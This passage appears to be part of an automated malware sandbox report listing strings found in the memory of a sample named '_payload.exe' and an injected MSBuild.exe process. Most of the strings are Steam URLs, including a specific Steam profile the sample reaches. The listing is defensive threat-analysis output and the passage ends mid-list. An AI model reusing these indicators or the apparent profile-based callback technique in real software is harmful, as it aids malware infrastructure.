00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://steamcommunity.com/discussions/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199747278259[1].htm.0.dr String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://steamcommunity.com/market/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, 
a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
Source: MSBuild.exe, 00000006.00000002.2344932078.0000000001308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259%
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, 
a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, 
a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003202000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259O
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003202000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/s
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, 
a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://steamcommunity.com/workshop/
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/z
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://store.steampowere
Source: 76561199747278259[1].htm.0.dr String found in binary or memory: https://store.steampowered.com/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 76561199747278259[1].htm.0.dr String found in binary or memory: https://store.steampowered.com/about/
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://store.steampowered.com/explore/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, 
a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://store.steampowered.com/legal/
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://store.steampowered.com/mobile
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, 
a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://store.steampowered.com/news/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 